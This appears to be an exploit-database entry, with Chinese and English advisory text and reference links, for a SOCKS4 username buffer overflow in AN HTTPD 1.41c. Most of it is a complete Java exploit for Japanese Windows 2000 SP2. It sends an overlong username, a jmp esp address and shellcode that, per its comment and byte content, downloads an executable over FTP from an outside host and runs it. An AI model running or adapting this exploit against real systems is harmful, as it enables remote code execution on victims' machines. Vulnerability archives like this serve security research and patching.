https://www.exploit-db.com/exploits/21955
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200212-109

ANHTTPD是一款日文多用户服务程序，可以以SOCKS4服务程序工作。ANHTTPD作为以SOCKS4服务程序工作时对用户提交的超长用户名SOCKS4请求处理不正确，远程攻击者可以利用这个漏洞进行缓冲区溢出攻击，可以以ANHTTPD进程权限在系统上执行任意指令。当ANHTTPD作为SOCKS4服务器时，对用户名处理不安全，攻击者可以在SOCKS4请求中附带超长的用户名，可导致ANHTTPD产生缓冲区溢出，精心构建提交数据可以以ANHTTPD进程在系统上执行任意指令。

source: http://www.securityfocus.com/bid/6012/info

A buffer overflow vulnerability has been reported for AN HTTPD. The vulnerability is due to insufficient bounds checking of usernames for SOCKS4 requests.

When AN HTTPD acts as a SOCKS4 server, it handles user names in an unsafe manner. An attacker can exploit this vulnerability by sending an overly long username as part of a SOCKS4 request. This may overflow a buffer used by AN HTTPD and cause the server to overwrite adjacent memory. Successful exploitation may, in turn, lead to the execution of arbitrary code as the AN HTTPD process.

/*///////////////////////////////////////////////////////////////////////////

 AN HTTPD Version 1.41c SOCKS4 username buffer overflow exploit
  for Japanese Windows 2000 Pro (SP2)

 written by Kanatoko <[email protected]>
 http://www.jumperz.net/

///////////////////////////////////////////////////////////////////////////*/

import java.net.*;
import java.io.*;

public class anhttpd141c_exploit
{
private static final int SOCKS_PORT        = 1080;

private String targetHost;
//----------------------------------------------------------------------------
public static void main( String[] args )
throws Exception
{
if( args.length != 1 )
        {
        System.out.println( "Usage: java anhttpd141c_exploit TARGETHOST( or IP )" );
        return;
        }
anhttpd141c_exploit instance = new anhttpd141c_exploit( args[ 0 ] );
instance.doIt();
}
//----------------------------------------------------------------------------
public anhttpd141c_exploit( String IN_targetHost )
throws Exception
{
targetHost        = IN_targetHost;
}
//----------------------------------------------------------------------------
private void doIt()
throws Exception
{
Socket socket        = new Socket( targetHost, SOCKS_PORT );
OutputStream os        = socket.getOutputStream();

byte[] socks4_request = {
(byte)0x04, (byte)0x01, (byte)0x00, (byte)0x01, (byte)0x00, (byte)0x00, (byte)0x00, (byte)0x01
};

        // egg: download and start installing Netscape4.79 :)
        // http://www.jumperz.net/egg_netscape.cpp
byte[] egg = {
(byte)0x55, (byte)0x8B, (byte)0xEC, (byte)0x53, (byte)0xEB, (byte)0x57, (byte)0x90, (byte)0x90,
(byte)0x90, (byte)0x5B, (byte)0x33, (byte)0xC0, (byte)0x88, (byte)0x63, (byte)0x01, (byte)0x88,
(byte)0x63, (byte)0x03, (byte)0x83, (byte)0xC3, (byte)0x68, (byte)0x88, (byte)0x23, (byte)0x88,
(byte)0x63, (byte)0x21, (byte)0x88, (byte)0x63, (byte)0x2E, (byte)0x83, (byte)0xEB, (byte)0x68,
(byte)0x53, (byte)0x83, (byte)0xC3, (byte)0x02, (byte)0x53, (byte)0xB9, (byte)0xC2, (byte)0x1B,
(byte)0x02, (byte)0x78, (byte)0xFF, (byte)0xD1, (byte)0x50, (byte)0x83, (byte)0xC3, (byte)0x02,
(byte)0x53, (byte)0xB9, (byte)0x8B, (byte)0x38, (byte)0x02, (byte)0x78, (byte)0xFF, (byte)0xD1,
(byte)0x59, (byte)0xB9, (byte)0xB8, (byte)0x0E, (byte)0x01, (byte)0x78, (byte)0xFF, (byte)0xD1,
(byte)0x83, (byte)0xC3, (byte)0x65, (byte)0x53, (byte)0xB9, (byte)0x4A, (byte)0x9B, (byte)0x01,
(byte)0x78, (byte)0xFF, (byte)0xD1, (byte)0x83, (byte)0xC3, (byte)0x21, (byte)0x53, (byte)0xB9,
(byte)0x4A, (byte)0x9B, (byte)0x01, (byte)0x78, (byte)0xFF, (byte)0xD1, (byte)0xB8, (byte)0x94,
(byte)0x8F, (byte)0xE6, (byte)0x77, (byte)0xFF, (byte)0xD0, (byte)0xE8, (byte)0xA7, (byte)0xFF,
(byte)0xFF, (byte)0xFF, (byte)0x77, (byte)0x58, (byte)0x71, (byte)0x58, (byte)0x62, (byte)0x69,
(byte)0x6E, (byte)0x61, (byte)0x72, (byte)0x79, (byte)0x0A, (byte)0x67, (byte)0x65, (byte)0x74,
(byte)0x20, (byte)0x2F, (byte)0x70, (byte)0x75, (byte)0x62, (byte)0x2F, (byte)0x63, (byte)0x6F,
(byte)0x6D, (byte)0x6D, (byte)0x75, (byte)0x6E, (byte)0x69, (byte)0x63, (byte)0x61, (byte)0x74,
(byte)0x6F, (byte)0x72, (byte)0x2F, (byte)0x65, (byte)0x6E, (byte)0x67, (byte)0x6C, (byte)0x69,
(byte)0x73, (byte)0x68, (byte)0x2F, (byte)0x34, (byte)0x2E, (byte)0x37, (byte)0x39, (byte)0x2F,
(byte)0x77, (byte)0x69, (byte)0x6E, (byte)0x64, (byte)0x6F, (byte)0x77, (byte)0x73, (byte)0x2F,
(byte)0x77, (byte)0x69, (byte)0x6E, (byte)0x64, (byte)0x6F, (byte)0x77, (byte)0x73, (byte)0x39,
(byte)0x35, (byte)0x5F, (byte)0x6F, (byte)0x72, (byte)0x5F, (byte)0x6E, (byte)0x74, (byte)0x2F,
(byte)0x63, (byte)0x6F, (byte)0x6D, (byte)0x70, (byte)0x6C, (byte)0x65, (byte)0x74, (byte)0x65,
(byte)0x5F, (byte)0x69, (byte)0x6E, (byte)0x73, (byte)0x74, (byte)0x61, (byte)0x6C, (byte)0x6C,
(byte)0x2F, (byte)0x63, (byte)0x63, (byte)0x33, (byte)0x32, (byte)0x64, (byte)0x34, (byte)0x37,
(byte)0x39, (byte)0x2E, (byte)0x65, (byte)0x78, (byte)0x65, (byte)0x0A, (byte)0x71, (byte)0x75,
(byte)0x69, (byte)0x74, (byte)0x58, (byte)0x66, (byte)0x74, (byte)0x70, (byte)0x2E, (byte)0x65,
(byte)0x78, (byte)0x65, (byte)0x20, (byte)0x2D, (byte)0x73, (byte)0x3A, (byte)0x71, (byte)0x20,
(byte)0x2D, (byte)0x41, (byte)0x20, (byte)0x66, (byte)0x74, (byte)0x70, (byte)0x2E, (byte)0x6E,
(byte)0x65, (byte)0x74, (byte)0x73, (byte)0x63, (byte)0x61, (byte)0x70, (byte)0x65, (byte)0x2E,
(byte)0x63, (byte)0x6F, (byte)0x6D, (byte)0x58, (byte)0x63, (byte)0x63, (byte)0x33, (byte)0x32,
(byte)0x64, (byte)0x34, (byte)0x37, (byte)0x39, (byte)0x2E, (byte)0x65, (byte)0x78, (byte)0x65,
(byte)0x58
};

byte[] jmp_esp = {
(byte)0x02, (byte)0x4E, (byte)0x02, (byte)0x78
};

os.write( socks4_request );

        //where is memset? :0
for( int i = 0; i < 1020; ++i )
        {
        os.write( (byte)0x41 );
        }

os.write( jmp_esp );
os.write( egg );
os.write( (byte)0x00 );
}
//----------------------------------------------------------------------------
}

来源:BID
名称:6012
链接:http://www.securityfocus.com/bid/6012
来源:XF
名称:an-http-socks4-bo(10410)
链接:http://www.iss.net/security_center/static/10410.php
来源:VULNWATCH
名称:20021021ANHTTPDSOCKS4usernameBufferOverflowVulnerability
链接:http://archives.neohapsis.com/archives/vulnwatch/2002-q4/0032.html
来源：NSFOCUS
名称：3711
链接：http://www.nsfocus.net/vulndb/3711